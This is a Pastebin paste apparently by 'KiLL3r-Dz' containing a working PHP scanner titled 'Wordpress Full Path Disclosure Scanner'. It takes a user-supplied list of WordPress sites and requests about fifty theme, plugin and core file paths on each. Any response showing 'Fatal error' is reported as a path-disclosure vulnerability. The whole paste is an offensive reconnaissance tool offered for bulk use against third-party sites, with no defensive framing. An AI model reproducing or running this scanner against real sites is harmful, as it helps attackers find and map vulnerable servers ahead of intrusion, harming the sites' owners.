Advertisement
KiLL3r-Dz

Wordpress Full Path Disclosure Scanner

May 24th, 2013
534
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.72 KB | None | 0 0
  1. <form method="post">
  2. <h3> Wordpress Full Path Disclosure Scanner </h3>
  3. <textarea name=sites cols=35 rows=20 placeholder="put wordpress sites here"></textarea>
  4. <br />
  5. <input name=scan type=submit value=scan>
  6. </form>
  7. <?php
  8. if(isset($_POST['scan'])){
  9. $sites = explode("\n",$_POST['sites']);
  10. $vulns = array(
  11. "/wp-content/themes/dt-chocolate/index.php",
  12. "/wp-content/themes/massimo/sp-framework/sp-wp-login.php",
  13. "/wp-content/themes/eggo/sp-framework/sp-wp-login.php",
  14. "/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./",
  15. "/wp-content/themes/slash/index.php",
  16. "/wp-content/plugins/vote-it-up/voteitup.php",
  17. "/wp-content/plugins/wp-polls/polls-templates.php",
  18. "/wp-content/plugins/ultimate-security-check/wp-ultimate-security.php",
  19. "/wp-content/plugins/dynamic-headers/custom-header.php",
  20. "/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php",
  21. "/wp-content/plugins/wp-newsletter-simples/tl-newslleter.php",
  22. "/wp-content/plugins/wp-events/wp-events.php",
  23. "/wp-content/plugins/wp-super-cache/wp-cache.php",
  24. "/wp-content/plugins/admin-menu-editor/menu-editor.php",
  25. "/wp-content/plugins/wp-photo-album/wppa.php",
  26. "/wp-content/plugins/wordpress-multibox-plugin/multibox.php",
  27. "/wp-content/plugins/superslider-show/superslider-show.php",
  28. "/wp-content/themes/sahifa/category.php",
  29. "/wp-content/themes/moneymasters/index.php",
  30. "/wp-content/plugins/sitepress-multilingual-cms/sitepress.php",
  31. "/wp-content/themes/display/framework/includes/timthumb.php?src=/wp-content/uploads/",
  32. "/wp-settings.php",
  33. "/wp-includes/admin-bar.php",
  34. "/wp-includes/author-template.php",
  35. "/wp-includes/canonical.php",
  36. "/wp-includes/category-template.php",
  37. "/wp-includes/class-wp-embed.php",
  38. "/wp-includes/media.php",
  39. "/wp-includes/ms-default-constants.php",
  40. "/wp-includes/ms-default-filters.php",
  41. "/wp-includes/ms-settings.php",
  42. "/wp-includes/post.php",
  43. "/wp-includes/rss.php",
  44. "/wp-includes/user.php",
  45. "/wp-includes/theme.php",
  46. "/wp-includes/vars.php",
  47. "/wp-includes/class-wp-http-ixr-client.php",
  48. "/wp-includes/class-wp-image-editor-gd.php",
  49. "/wp-includes/class-wp-image-editor-imagick.php",
  50. "/wp-includes/class-wp-xmlrpc-server.php",
  51. "/wp-includes/class.wp-scripts.php",
  52. "/wp-includes/class.wp-styles.php",
  53. "/wp-includes/comment-template.php",
  54. "/wp-includes/default-filters.php",
  55. "/wp-includes/default-widgets.php",
  56. "/wp-includes/feed-atom-comments.php",
  57. "/wp-includes/feed-atom.php",
  58. "/wp-includes/feed-rdf.php",
  59. "/wp-includes/feed-rss.php",
  60. "/wp-includes/feed-rss2-comments.php",
  61. "/wp-includes/feed-rss2.php",
  62. "/wp-includes/functions.php"
  63. );
  64. foreach($sites as $site){
  65. foreach($vulns as $vuln){
  66.  
  67. if (preg_match("/Fatal error/",@file_get_contents("$site$vuln"))){
  68. echo "<hr>";
  69. echo "vuln : $site$vuln <br />";
  70. }
  71. }
  72. }
  73. }
  74. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement